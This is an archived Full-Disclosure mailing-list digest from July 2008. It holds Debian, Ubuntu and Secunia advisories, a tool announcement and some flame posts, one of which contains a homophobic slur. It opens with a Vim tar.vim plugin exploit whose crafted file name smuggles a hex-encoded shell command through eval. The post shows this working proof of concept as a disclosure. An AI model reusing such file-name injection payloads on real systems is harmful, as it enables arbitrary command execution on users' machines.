> netrw     : EXPLOIT FAILED
>
> The original tarplugin exploit now produces a string of telling error messages:
>
> /bin/bash: so%: command not found
> tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo:
> Cannot open: No such file or directory
> tar: Error is not recoverable: exiting now
> /bin/bash: retu: command not found
> /bin/bash: bar.tar|retu|'bar.tar: command not found
>
> It's easy to see that it is still possible to execute arbitrary shell commands.
>
> $VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:
>
>    136   if tarfile =~# '\.\(gz\|tgz\)$'
>    137 "   call Decho("1: exe silent r! gzip -d -c
> ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
>   *138    exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." |
> ".g:tar_cmd." -".g:tar_browseoptions." - "
>    139   elseif tarfile =~# '\.lrp'
>    140 "   call Decho("2: exe silent r! cat --
> ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd."
> -".g:tar_browseoptions." - ")
>   *141    exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c
> -|".g:tar_cmd." -".g:tar_browseoptions." - "
>    142   elseif tarfile =~# '\.bz2$'
>    143 "   call Decho("3: exe silent r! bzip2 -d -c
> ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
>   *144    exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." |
> ".g:tar_cmd." -".g:tar_browseoptions." - "
>    145   else
>    146 "   call Decho("4: exe silent r! ".g:tar_cmd."
> -".g:tar_browseoptions." ".s:Escape(tarfile))
>  **147    exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions."
> ".s:Escape(tarfile)
> [...]
>    444 fun s:Escape(name)
>    445   " shellescape() was added by patch 7.0.111
>    446   if exists("*shellescape")
>    447    let qnameq= shellescape(a:name)
>    448   else
>    449    let qnameq= g:tar_shq . a:name . g:tar_shq
>    450   endif
>    451   return qnameq
>    452 endfun
>
> (*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.
>
> (**) tar(1) allows arbitrary command execution via options ``--to-command'',
> and ``--use-compress-program''.
>
>
> The updated tarplugin attack is rather simple:
>
> $ rm -rf ./*
> $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 |
> xxd -r\`;'bar.tar"
> $ vim +:q ./foo*
> $ ls -l pwned
> -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned
>
> Cheers,
> Jan Minar.
>
> ------------------------------
>
> Message: 6
> Date: Tue, 1 Jul 2008 21:25:39 +0100
> From: Steve Kemp
> Subject: [Full-disclosure] [SECURITY] [DSA 1560-1] New sympa packages
>   fix denial of service
> To: debian-security-announce at lists.debian.org
> Message-ID: <20080701202539.GA32605 at steve.org.uk>
> Content-Type: text/plain; charset=us-ascii
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> - ------------------------------------------------------------------------
> Debian Security Advisory DSA-1600-1                  security at debian.org
> http://www.debian.org/security/                               Steve Kemp
> July 01, 2008                         http://www.debian.org/security/faq
> - ------------------------------------------------------------------------
>
> Package        : sympa
> Vulnerability  : dos
> Problem type   : remote
> Debian-specific: no
> CVE Id(s)      : CVE-2008-1648
> Debian Bug     : 475163
>
> It was discovered that sympa, a modern mailing list manager, would
> crash when processing certain types of malformed messages.
>
> For the stable distribution (etch), this problem has been fixed in version
> 5.2.3-1.2+etch1.
>
> For the unstable distribution (sid), this problem has been fixed in
> version 5.3.4-4.
>
> We recommend that you upgrade your sympa package.
>
>
> Upgrade instructions
> - --------------------
>
> wget url
>         will fetch the file for you
> dpkg -i file.deb
>         will install the referenced file.
>
> If you are using the apt-get package manager, use the line for
> sources.list as given below:
>
> apt-get update
>         will update the internal database
> apt-get upgrade
>         will install corrected packages
>
> You may use an automated update by adding the resources from the
> footer to the proper configuration.
>
>
> Debian GNU/Linux 4.0 alias etch
> - -------------------------------
>
> These files will probably be moved into the stable distribution on
> its next update.
>
> - ---------------------------------------------------------------------------------
> For apt-get: deb http://security.debian.org/ stable/updates main
> For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
> Mailing list: debian-security-announce at lists.debian.org
> Package info: `apt-cache show ' and http://packages.debian.org/
>
> ------------------------------
>
> Message: 7
> Date: Wed, 2 Jul 2008 02:02:02 +0200 (CEST)
> From: Michal Zalewski
> Subject: [Full-disclosure] [tool] ratproxy - passive web application
>   security assessment tool
> To: bugtraq at securityfocus.com, websecurity at webappsec.org
> Cc: full-disclosure at lists.grok.org.uk
> Message-ID:
> Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
>
> Hi all,
>
> I am happy to announce that we've just open sourced ratproxy - a free,
> passive web security assessment tool. This utility is designed to
> transparently analyze legitimate, browser-driven interactions with tested
> web applications - and automatically pinpoint, annotate, and prioritize
> potential flaws or areas of concern on the fly.
>
> The proxy analyzes problems such as cross-site script inclusion threats,
> insufficient cross-site request forgery defenses, caching issues,
> potentially unsafe cross-domain code inclusion schemes and information
> leakage scenarios, and much more.
>
> For a detailed discussion of the utility, please visit:
>    http://code.google.com/p/ratproxy/wiki/RatproxyDoc
>
> Source code is available at:
>    http://code.google.com/p/ratproxy/downloads/list
>
> And finally, screenshot of a sample report can be found here:
>    http://lcamtuf.coredump.cx/ratproxy-screen.png
>
> The tool should run on Linux, *BSD, MacOS X, and Windows (Cygwin). Since
> it is in beta, there might be some kinks to be ironed out, and not all web
> technologies might be properly accounted for. Feedback is appreciated.
>
> Please keep in mind that the proxy is meant to highlight interesting
> patterns in web applications; a further analysis by a security
> professional is required to interpret the significance of results for a
> particular platform.
>
> Cheers,
> /mz
>
> ------------------------------
>
> Message: 8
> Date: Wed, 2 Jul 2008 02:19:01 -0300
> From: "Filipe Balestra"
> Subject: Re: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege
>   Escalation Vulnerability
> To:
> Message-ID:
> Content-Type: text/plain; charset="iso-8859-1"
>
> mrdkaaa,
>
> are you saying that this vulnerability is not new to the public?
>
> The program phgrafx had some vulnerabilities published, but this one is not the same of any other that I can find in securityfocus. One program can have a lot of vulnerabilities :)
>
> But yes, this vulnerability is at least four years old, but was not public.
>
> Anyway, QNX released Service Packs to solve some security problems in the past, and it's not our problem, we are advising the customers, they can choose or not the company. If you are a customer you probably would like to know about security issues in all product that you use. Also, we agree it's a crap vuln, that's why we took too long to release it. Whatever, why hold it?
>
> p.s.: Rodrigo and me are no longer working for Scanit, so it's just a personal opinion, not a company official position. If you want to know about the company vulnerability release process or any other information, please, contact the Scanit R&D team.
>
> Cheers,
>
> Filipe Alcarde Balestra
>
> ------------------------------
>
> Message: 9
> Date: Wed, 2 Jul 2008 08:29:43 +0200
> From: Tonnerre Lombard
> Subject: Re: [Full-disclosure] Full-Disclosure? introducing
>   lul-disclosure.
> To: staff at lul-disclosure.net
> Cc: full-disclosure at lists.grok.org.uk
> Message-ID: <20080702082943.2811aba5 at wssyg117.sygroup-int.ch>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Salut,
>
> On Mon, 30 Jun 2008 21:57:29 -0400, staff wrote:
> > Are you ready for a site that isn't full of fagottry? Where Gadi cant
> > steal your money or eat your lunches? Where you can freely submit
> > lulz to be published? Where Theo's defeat and denial are brought to
> > light? Wait no more!
>
> You mean a site which evidently cannot tell the difference between
> local and remote root vulnerabilities? (The local root exploit for
> obsd4 which is published on that site contains a patch to increment the
> count of _remote_ vulnerabilities on the obsd web site.)
>
> Tonnerre
> --
> SyGroup GmbH
> Tonnerre Lombard
>
> Solutions Systematiques
> Tel:+41 61 333 80 33    Güterstrasse 86
> Fax:+41 61 383 14 67    4053 Basel
> Web:www.sygroup.ch      tonnerre.lombard at sygroup.ch
>
> ------------------------------
>
> Message: 10
> Date: Tue, 01 Jul 2008 21:47:36 +0200
> From: DeepSec 2008
> Subject: [Full-disclosure] Deepsec Talks 2007 are online -
>   registration for 2008 is open
> To: full-disclosure at lists.grok.org.uk
> Message-ID: <486A89D8.2000303 at deepsec.net>
> Content-Type: text/plain; charset=UTF-8; format=flowed
>
> Dear Madam, dear Sir,
>
> DeepSec Vienna, the annual In-Depth Security Conference has opened
> online registrations for 2008. Registrations will receive a discount
> of 5% off the regular fees until August 31st if you use the following
> promotional code: earlybird-L4KZIEUE on our online registration form
> at https://deepsec.net/register/
>
> Videos from 2007 are online:
>
> Also we are happy to announce that talks from last year's conference
> are online. Listen to last year's talks in full length at:
> http://video.google.com/videosearch?q=deepsec&sitesearch=#
>
> Call for Papers still Open for two weeks:
>
> If you have some good ideas for a Talk at the conference and haven't
> decided yet to submit we encourage you to do so now. We still accept
> submissions at https://deepsec.net/cfp/ or via e-mail to:
> cfp at deepsec.net
>
>
> We hope to hear from you and of course to meet in Vienna in November!
>
> Best Regards,
>
> Paul Böhm,
> René Pfeiffer,
> Michael Kafka
> DeepSec GmbH
>
>
> --
> DeepSec In-Depth Security Conference
> November 11th to 14th 2008, Vienna, Austria
> https://deepsec.net/
>
> ------------------------------
>
> Message: 11
> Date: Wed, 02 Jul 2008 04:08:38 -0300
> From: root
> Subject: Re: [Full-disclosure] Full-Disclosure? introducing
>   lul-disclosure.
> To: staff at lul-disclosure.net
> Cc: full-disclosure at lists.grok.org.uk
> Message-ID: <486B2976.8000708 at fibertel.com.ar>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> You couldn't do the remote exploit even with a google video documenting
> it step by step.
> More like fail-disclosure.
>
> staff wrote:
> > Are you ready for a site that isn't full of fagottry? Where Gadi cant steal
> > your money or eat your lunches? Where you can freely submit lulz to be
> > published? Where Theo's defeat and denial are brought to light? Wait no
> > more!
> >
> > http://lul-disclosure.net/
> >
> > WhiteHat? BlackHat? We are lulzhat.
> > Fuck you and your hats.
> >
> > ------------------------------------------------------------------------
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> ------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> End of Full-Disclosure Digest, Vol 41, Issue 3
> **********************************************

unsubscribe

From jamie at canonical.com Wed Jul 2 13:45:38 2008
From: jamie at canonical.com (Jamie Strandboge)
Date: Wed, 2 Jul 2008 08:45:38 -0400
Subject: [Full-disclosure] [USN-619-1] Firefox vulnerabilities
Message-ID: <20080702124538.GM11562@severus.strandboge.com>

===========================================================
Ubuntu Security Notice USN-619-1              July 02, 2008
firefox vulnerabilities
CVE-2008-2798, CVE-2008-2799, CVE-2008-2800, CVE-2008-2801,
CVE-2008-2802, CVE-2008-2803, CVE-2008-2805, CVE-2008-2806,
CVE-2008-2807, CVE-2008-2808, CVE-2008-2809, CVE-2008-2810,
CVE-2008-2811
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  firefox    1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1

Ubuntu 7.04:
  firefox    2.0.0.15+0nobinonly-0ubuntu0.7.4

Ubuntu 7.10:
  firefox    2.0.0.15+1nobinonly-0ubuntu0.7.10

After a standard system upgrade you need to restart Firefox to effect
the necessary changes.

Details follow:

Various flaws were discovered in the browser engine. By tricking
a user into opening a malicious web page, an attacker could cause
a denial of service via application crash, or possibly execute
arbitrary code with the privileges of the user invoking the
program. (CVE-2008-2798, CVE-2008-2799)

Several problems were discovered in the JavaScript engine. If a
user were tricked into opening a malicious web page, an attacker
could perform cross-site scripting attacks. (CVE-2008-2800)

Collin Jackson discovered various flaws in the JavaScript engine
which allowed JavaScript to be injected into signed JAR files. If
a user were tricked into opening malicious web content, an
attacker may be able to execute arbitrary code with the
privileges of a different website or link content within the JAR
file to an attacker-controlled JavaScript file. (CVE-2008-2801)

It was discovered that Firefox would allow non-privileged XUL
documents to load chrome scripts from the fastload file. This
could allow an attacker to execute arbitrary JavaScript code with
chrome privileges. (CVE-2008-2802)

A flaw was discovered in Firefox that allowed overwriting trusted
objects via mozIJSSubScriptLoader.loadSubScript(). If a user were
tricked into opening a malicious web page, an attacker could
execute arbitrary code with the privileges of the user invoking
the program. (CVE-2008-2803)

Claudio Santambrogio discovered a vulnerability in Firefox which
could lead to stealing of arbitrary files. If a user were tricked
into opening malicious content, an attacker could force the
browser into uploading local files to the remote server.
(CVE-2008-2805)

Gregory Fleischer discovered a flaw in Java LiveConnect. An
attacker could exploit this to bypass the same-origin policy and
create arbitrary socket connections to other domains.
(CVE-2008-2806)

Daniel Glazman found that an improperly encoded .properties file
in an add-on can result in uninitialized memory being used. If a
user were tricked into installing a malicious add-on, the browser
may be able to see data from other programs. (CVE-2008-2807)

Masahiro Yamada discovered that Firefox did not properly sanitize
file URLs in directory listings, resulting in files from
directory listings being opened in unintended ways or not being
able to be opened by the browser at all. (CVE-2008-2808)

John G. Myers discovered a weakness in the trust model used by
Firefox regarding alternate names on self-signed certificates. If
a user were tricked into accepting a certificate containing
alternate name entries, an attacker could impersonate another
server. (CVE-2008-2809)

A flaw was discovered in the way Firefox opened URL files. If a
user were tricked into opening a bookmark to a malicious web
page, the page could potentially read from local files on the
user's computer. (CVE-2008-2810)

A vulnerability was discovered in the block reflow code of
Firefox. This vulnerability could be used by an attacker to cause
a denial of service via application crash, or execute arbitrary
code with the privileges of the user invoking the program.
(CVE-2008-2811)

Updated packages for Ubuntu 6.06 LTS:
Updated packages for Ubuntu 7.04:
http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+0nobinonly-0ubuntu0.7.4_amd64.deb Size/MD5: 10486520 662aa1a55a9c9126f00e161acaa06143 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_amd64.deb Size/MD5: 228846 c06d95261a00257c1d585281a6ba31d7 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_amd64.deb Size/MD5: 174366 bed6cb9c880507b290faf0332db1717c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_amd64.deb Size/MD5: 254936 e113790e50610566ddf6c1c94f964b3e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_amd64.deb Size/MD5: 888168 0fe2f646e715adcc0f3e75253c331bb6 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 49787920 b63b40a508cb5bfbbf53059be10d8391 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 3177264 9f821bade8d63783a367f82328673d87 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 86906 b9c62c2432f49db6b851b8dc807da17d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 62092 e674ecd502eacda834368c557e1b6143 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 9294592 79e1b6e99dbce290cd56ba6755dc881d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 228854 5fdbf6bd20f86f70797316b36ab4d173 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 163288 b78c777702f3df4f0ebea2ebe63ce6d6 
http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 254924 3465792dc109b728a78d6ffb29f53376 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 809578 4b2310f5cb97c4e296180cb40756a894 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 52298392 2b28d6ee19d84e536245eb95d0a8a909 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 3188938 7018bb95c07c6aaa97cde7b972a20166 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 90740 bc84e90a93fb5b7b9f20d67c86c03a2e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 62926 e57644c65aea1a4f90f523353bf1e5b1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 10365110 3c0dfb58abb3d0efa6735f4cc98d7b20 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 228860 3ba05d40bcb2a5f81c1b109015c4784a http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 180002 733154c484aa8048529f64e366d8cb29 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 254952 ced3de59adae121b57919d85ef2ee7c8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 896026 c822eb94fd5cebae2c49ffd3afcfaef4 sparc architecture (Sun SPARC/UltraSPARC): 
http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 49823786 e4c4ad5e13abfc980dcb8845170a6066 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 3175916 2736c2ab5c8fe48c0f2bfc670237f7d3 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 86592 9794cd53ceaab43313006dc928090ca6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 62138 c4d4d60255fa8a232436103ecbbe8d26 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 9571186 d2d4086ccfe3d59683645a431822f0f4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 228848 a3b0b8cf03b5ccd5da1e4bfe4debde7e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 162076 6264a5f87b7d8492afbeec02f14a97fe http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 254936 ba67be4782a972a18fe465fca598b34b http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 801408 074ce0ac99fbfe8467768644edc25dad Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10.diff.gz Size/MD5: 193549 3df61e6e5dda06822772c81f55a5e09c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10.dsc Size/MD5: 1189 e474d538b042590c54cf779317c127be http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly.orig.tar.gz Size/MD5: 37810765 e123b1b65f4ed97980590928f961c5f2 Architecture independent 
packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.15+1nobinonly-0ubuntu0.7.10_all.deb Size/MD5: 200814 973c84088bba9fe7619562607649ae91 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 78049446 ff9b6ef4ff7e676de1e7631bf7cb8a3d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 3197256 c69ca60dc08dc4dd83b53df27cbd7f32 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 98146 cb5365397df1022104b9c9d8de5b6409 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 67152 1b33bdeb31a95455a4ea0a6024cc76e1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 10460276 7b2bf1c6f2e685e09d1e5dd937a380b4 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 77181324 f27d2a52d29eb953a2a2b2e72251ecfe http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 3184840 e58f0f841248dbdc40513724ddaa84cf http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 91840 87c455efc0df2403f962b0df9d4e6177 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 66434 2bf2dc0e8a6333c58577db96edd98e35 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 9203290 7e0ebb7384bd4b504bff560e370291a5 lpia architecture (Low Power Intel Architecture): 
http://ports.ubuntu.com/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 77460616 71b471e86aa5c6e2eac09a3251b80d94 http://ports.ubuntu.com/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 3182378 d90bfbae7b9743aeb4d592f517361c90 http://ports.ubuntu.com/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 91500 97848bd89ef94ffc7bd095185fe508f0 http://ports.ubuntu.com/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 66380 8dd93b124088314c1449195ce8201f6c http://ports.ubuntu.com/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 9062590 4850c76f7d1e1c6ca9658863ac77e15f powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 80664386 0d6ef7225c028ede3092d9f86af0d736 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 3200788 05c74bf9d2ee0d0407c41a83651ea0a4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 96178 58b2e155dc810ef5ea790e7af6bbd71d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 67430 8b6d5d82b36e32c68b1b8eb2aeddd06e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 10303234 18af52f985e61e7b4d9f573aafd5b6d6 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 78015546 63c0534c7bba8d01e36158fb58b6693e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 3182386 45c83bd5709c26e42d19a4a02d7e72ec 
http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 91608 ad47d76f9e3afec9105cefaf73510d82 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 66516 32af5ef7efccbd08fa8d83811d197384 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 9453348 532a9a6fac002e08dfde90555242d54a -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/8f5bfdf3/attachment.bin From mrdkaaa at stream.cz Wed Jul 2 17:33:47 2008 
From: mrdkaaa at stream.cz (mrdkaaa)
Date: Wed, 02 Jul 2008 18:33:47 +0200 (CEST)
Subject: [Full-disclosure] Full-Disclosure? introducing lul-disclosure.
In-Reply-To: <20080702082943.2811aba5@wssyg117.sygroup-int.ch>
Message-ID: <20.36-21823-232776016-1215016427@stream.cz>

Tonnerre, does it hurt you to use your brain for thinking?

m.

> ------------ Original message ------------
> From: Tonnerre Lombard
> Subject: Re: [Full-disclosure] Full-Disclosure? introducing lul-disclosure.
> Date: 02.7.2008 08:31:26
> ----------------------------------------
> Salut,
>
> On Mon, 30 Jun 2008 21:57:29 -0400, staff wrote:
> > Are you ready for a site that isn't full of fagottry? Where Gadi can't
> > steal your money or eat your lunches? Where you can freely submit
> > lulz to be published? Where Theo's defeat and denial are brought to
> > light? Wait no more!
>
> You mean a site which evidently cannot tell the difference between
> local and remote root vulnerabilities? (The local root exploit for
> obsd4 which is published on that site contains a patch to increment the
> count of _remote_ vulnerabilities on the obsd web site.)
>
> Tonnerre
> --
> SyGroup GmbH
> Tonnerre Lombard
>
> Solutions Systematiques
> Tel:+41 61 333 80 33 Güterstrasse 86
> Fax:+41 61 383 14 67 4053 Basel
> Web:www.sygroup.ch tonnerre.lombard at sygroup.ch
>

From remove-vuln at secunia.com Wed Jul 2 15:53:27 2008
From: remove-vuln at secunia.com (Secunia Research)
Date: Wed, 2 Jul 2008 16:53:27 +0200
Subject: [Full-disclosure] Secunia Research: VLC Media Player WAV Processing Integer Overflow
Message-ID: <200807021453.m62ErRFj011250@ca.secunia.com>

======================================================================

                     Secunia Research 02/07/2008

        - VLC Media Player WAV Processing Integer Overflow -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* VLC Media Player 0.8.6h on Windows

NOTE: Prior versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System access
Where:  Remote

======================================================================
3) Vendor's Description of Software

"VLC media player is a highly portable multimedia player for various
audio and video formats (MPEG-1, MPEG-2, MPEG-4, DivX, mp3, ogg, ...)
as well as DVDs, VCDs, and various streaming protocols."

Product Link:
http://www.videolan.org/vlc/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in VLC Media Player,
which can be exploited by malicious people to compromise a user's
system.

The vulnerability is caused due to an integer overflow error within
the "Open()" function in modules/demux/wav.c. This can be exploited
to cause a heap-based buffer overflow via a specially crafted WAV
file having an overly large "fmt" chunk.

Successful exploitation may allow execution of arbitrary code.

======================================================================
5) Solution

Update to version 0.8.6i, which should be available soon.

Do not open untrusted WAV files.

======================================================================
6) Time Table

27/06/2008 - Vendor notified.
